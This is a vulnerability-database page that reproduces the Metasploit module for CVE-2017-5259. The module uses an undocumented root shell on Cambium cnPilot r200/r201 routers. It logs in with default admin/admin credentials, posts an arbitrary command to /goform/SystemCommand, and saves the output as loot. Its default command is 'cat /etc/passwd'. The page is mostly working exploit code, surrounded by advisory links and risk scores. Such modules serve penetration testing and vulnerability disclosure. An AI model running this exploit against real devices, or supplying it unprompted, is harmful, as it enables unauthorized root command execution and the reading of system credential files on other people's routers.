Lucene search
K

Cambium cnPilot r200/r201 Command Execution as 'root'

🗓️ 18 Dec 2017 22:32:55Reported by Karn Ganeshen <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 62 Views

Cambium cnPilot r200/r201 Command Execution as 'root' via undocumented backdoo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-5259
29 May 201815:50
circl
CNVD
Cambium Networks cnPilot Backdoor Access Elevation of Privilege Vulnerability
21 Dec 201700:00
cnvd
CVE
CVE-2017-5259
20 Dec 201722:00
cve
Cvelist
CVE-2017-5259
20 Dec 201722:00
cvelist
NVD
CVE-2017-5259
20 Dec 201722:29
nvd
OSV
CVE-2017-5259
20 Dec 201722:29
osv
Packet Storm
Cambium CnPilot R200/r201 Command Execution
31 Aug 202400:00
packetstorm
Prion
Path traversal
20 Dec 201722:29
prion
Positive Technologies
PT-2017-16427
20 Dec 201700:00
ptsecurity
The Hacker News
Mirai Botnet Variant Exploits Four-Faith Router Vulnerability for DDoS Attacks
8 Jan 202510:29
thn
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::CNPILOT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Cambium cnPilot r200/r201 Command Execution as 'root'",
        'Description' => %q{
          Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to
          4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is
          accessible via a specific url, to any authenticated user. The module uses this
          shell to execute arbitrary system commands as 'root'.
        },
        'Author' => [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
        'References' => [
          ['CVE', '2017-5259'],
          ['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']
        ],
        'License' => MSF_LICENSE
      )
    )

    register_options(
      [
        OptInt.new('TIMEOUT', [true, 'HTTP connection timeout', 10]),
        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin']),
        OptString.new('CMD', [true, 'Command(s) to run', 'cat /etc/passwd'])
      ], self.class
    )

    deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')
  end

  def run_host(_ip)
    unless is_app_cnpilot?
      return
    end
  end

  # command execution happens here

  def cmd_exec_run(the_cookie)
    # Verify backdoor 'root' shell url exists
    root_shell = (ssl ? 'https' : 'http').to_s + '://' + "#{rhost}:#{rport}" + '/adm/syscmd.asp'
    print_status("#{rhost}:#{rport} - Checking backdoor 'root' shell...")

    res = send_request_cgi(
      {
        'uri' => '/adm/syscmd.asp',
        'method' => 'GET',
        'cookie' => the_cookie,
        'headers' => {
          'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
      }
    )

    # Now POST the command
    if res && res.code == 200
      uri1 = '/goform/SystemCommand'
      inject_cmd = datastore['CMD']
      print_good("#{rhost}:#{rport} - You can access the 'root' shell at: #{root_shell}")
      print_good("#{rhost}:#{rport} - Executing command - #{inject_cmd}")

      send_request_cgi(
        {
          'uri' => uri1,
          'method' => 'POST',
          'cookie' => the_cookie,
          'headers' => {
            'Accept' => '*/*',
            'Accept-Language' => 'en-US,en;q=0.5',
            'Accept-Encoding' => 'gzip, deflate',
            'Connection' => 'keep-alive'
          },
          'vars_post' =>
            {
              'command' => inject_cmd,
              'SystemCommandSubmit' => 'Apply'
            }
        }
      )

      # Results are populated in the first url, so GET it once more
      res = send_request_cgi(
        {
          'uri' => '/adm/syscmd.asp',
          'method' => 'GET',
          'cookie' => the_cookie,
          'headers' => {
            'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
          }
        }
      )

      html = Nokogiri::HTML(res.body)
      search_result = html.search('textarea').text

      if search_result.nil?
        print_status('Command run did not return any results or invalid command. Note that cnPilot devices only have a restricted *nix command-set.')
      else
        print_good(search_result.to_s)

        # w00t we got l00t
        loot_name = 'cmd-exec-log'
        loot_type = 'text/plain'
        loot_desc = 'Cambium cnPilot CMD Exec Results'
        data = search_result.to_s
        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
        print_good("File saved in: #{p}")
      end
    else
      print_error("#{rhost}:#{rport} - Backdoor 'root' shell not found. Affected versions are - v4.2.3-R4 and newer. You can try to verify the shell at #{root_shell}")
      return
    end
  end

  #
  # Login & initiate cmd_exec_run
  #

  def run_login
    cookie, cnpilot_version = do_login(datastore['USERNAME'], datastore['PASSWORD'])
    if cookie == 'skip' && cnpilot_version == 'skip'
      return
    elsif ['4.2.3-R4', '4.3.1-R1', '4.3.2-R4', '4.3.3-R4'].include?(cnpilot_version.to_s)
      cmd_exec_run(cookie)
    else
      vprint_error("#{rhost}:#{rport} - This software version is not vulnerable. Affected versions are - v4.2.3-R4 and newer.")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 14:30Current
7.7High risk
Vulners AI Score7.7
CVSS 29
CVSS 38.8
EPSS0.39181
62